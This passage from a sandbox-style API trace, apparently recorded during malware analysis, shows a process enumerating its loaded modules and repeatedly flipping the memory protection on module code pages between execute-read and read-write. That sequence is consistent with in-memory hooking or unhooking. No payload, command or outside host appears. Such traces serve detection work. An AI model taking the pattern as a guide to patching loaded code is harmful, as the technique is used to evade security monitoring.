BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.671] GetCurrentProcess () returned 0xffffffff [0053.671] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1128, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.671] GetCurrentProcess () returned 0xffffffff [0053.671] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1138, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.671] GetCurrentProcess () returned 0xffffffff [0053.672] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1138, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.672] GetCurrentProcess () returned 0xffffffff [0053.672] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1164, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.672] GetCurrentProcess () returned 0xffffffff [0053.672] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1164, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.672] GetCurrentProcess () returned 0xffffffff [0053.672] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f11b4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.673] GetCurrentProcess () returned 0xffffffff [0053.673] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f11b4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.673] GetCurrentProcess () returned 0xffffffff [0053.673] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f11b8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.673] GetCurrentProcess () returned 0xffffffff [0053.673] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f11b8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.674] GetCurrentProcess () returned 0xffffffff [0053.674] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f11c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.674] GetCurrentProcess () returned 0xffffffff [0053.674] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f11c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.674] GetCurrentProcess () returned 0xffffffff [0053.674] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f11c8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.675] GetCurrentProcess () returned 0xffffffff [0053.675] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f11c8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.675] GetCurrentProcess () returned 0xffffffff [0053.675] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1208, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.676] GetCurrentProcess () returned 0xffffffff [0053.676] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1208, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.677] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.678] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671030, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.678] GetCurrentProcess () returned 0xffffffff [0053.678] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671030, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.679] GetCurrentProcess () returned 0xffffffff [0053.679] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671038, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.679] GetCurrentProcess () returned 0xffffffff [0053.679] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671038, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.679] GetCurrentProcess () returned 0xffffffff [0053.679] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7567103c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.680] GetCurrentProcess () returned 0xffffffff [0053.680] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7567103c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.680] GetCurrentProcess () returned 0xffffffff [0053.680] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671054, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.681] GetCurrentProcess () returned 0xffffffff [0053.681] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671054, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.681] GetCurrentProcess () returned 0xffffffff [0053.681] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671058, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.682] GetCurrentProcess () returned 0xffffffff [0053.682] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671058, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.682] GetCurrentProcess () returned 0xffffffff [0053.682] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7567105c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.683] GetCurrentProcess () returned 0xffffffff [0053.683] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7567105c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.684] GetCurrentProcess () returned 0xffffffff [0053.684] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671064, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.684] GetCurrentProcess () returned 0xffffffff [0053.684] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671064, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.685] GetCurrentProcess () returned 0xffffffff [0053.685] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671068, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.685] GetCurrentProcess () returned 0xffffffff [0053.685] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671068, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.685] GetCurrentProcess () returned 0xffffffff [0053.685] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671070, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.686] GetCurrentProcess () returned 0xffffffff [0053.686] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671070, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.686] GetCurrentProcess () returned 0xffffffff [0053.686] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671078, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.687] GetCurrentProcess () returned 0xffffffff [0053.687] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671078, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.687] GetCurrentProcess () returned 0xffffffff [0053.687] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7567107c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.687] GetCurrentProcess () returned 0xffffffff [0053.687] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7567107c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.687] GetCurrentProcess () returned 0xffffffff [0053.687] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671080, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.688] GetCurrentProcess () returned 0xffffffff [0053.688] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75671080, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.688] GetCurrentProcess () returned 0xffffffff [0053.688] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756710d0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.688] GetCurrentProcess () returned 0xffffffff [0053.688] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756710d0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.689] GetCurrentProcess () returned 0xffffffff [0053.689] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756710dc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.689] GetCurrentProcess () returned 0xffffffff [0053.689] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756710dc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75671000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.689] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.690] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621010, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.690] GetCurrentProcess () returned 0xffffffff [0053.690] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621010, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.690] GetCurrentProcess () returned 0xffffffff [0053.690] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621018, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.691] GetCurrentProcess () returned 0xffffffff [0053.691] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621018, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.691] GetCurrentProcess () returned 0xffffffff [0053.691] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621034, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.691] GetCurrentProcess () returned 0xffffffff [0053.691] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621034, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.692] GetCurrentProcess () returned 0xffffffff [0053.692] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621038, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.692] GetCurrentProcess () returned 0xffffffff [0053.692] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621038, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.692] GetCurrentProcess () returned 0xffffffff [0053.692] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621048, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.693] GetCurrentProcess () returned 0xffffffff [0053.693] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621048, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.693] GetCurrentProcess () returned 0xffffffff [0053.693] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621054, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.693] GetCurrentProcess () returned 0xffffffff [0053.693] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621054, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.693] GetCurrentProcess () returned 0xffffffff [0053.693] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621060, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.694] GetCurrentProcess () returned 0xffffffff [0053.694] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621060, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.694] GetCurrentProcess () returned 0xffffffff [0053.694] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7562107c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.694] GetCurrentProcess () returned 0xffffffff [0053.694] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7562107c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.695] GetCurrentProcess () returned 0xffffffff [0053.695] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621080, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.695] GetCurrentProcess () returned 0xffffffff [0053.695] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621080, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.695] GetCurrentProcess () returned 0xffffffff [0053.695] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621084, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.696] GetCurrentProcess () returned 0xffffffff [0053.696] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621084, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.696] GetCurrentProcess () returned 0xffffffff [0053.696] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621088, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.696] GetCurrentProcess () returned 0xffffffff [0053.696] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621088, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.696] GetCurrentProcess () returned 0xffffffff [0053.696] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756210a8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.697] GetCurrentProcess () returned 0xffffffff [0053.697] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756210a8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.697] GetCurrentProcess () returned 0xffffffff [0053.697] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756210ac, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.697] GetCurrentProcess () returned 0xffffffff [0053.697] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756210ac, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.698] GetCurrentProcess () returned 0xffffffff [0053.698] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7562110c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.698] GetCurrentProcess () returned 0xffffffff [0053.698] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7562110c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.698] GetCurrentProcess () returned 0xffffffff [0053.698] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7562114c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.699] GetCurrentProcess () returned 0xffffffff [0053.699] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7562114c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.699] GetCurrentProcess () returned 0xffffffff [0053.699] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621154, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.699] GetCurrentProcess () returned 0xffffffff [0053.699] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75621154, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, 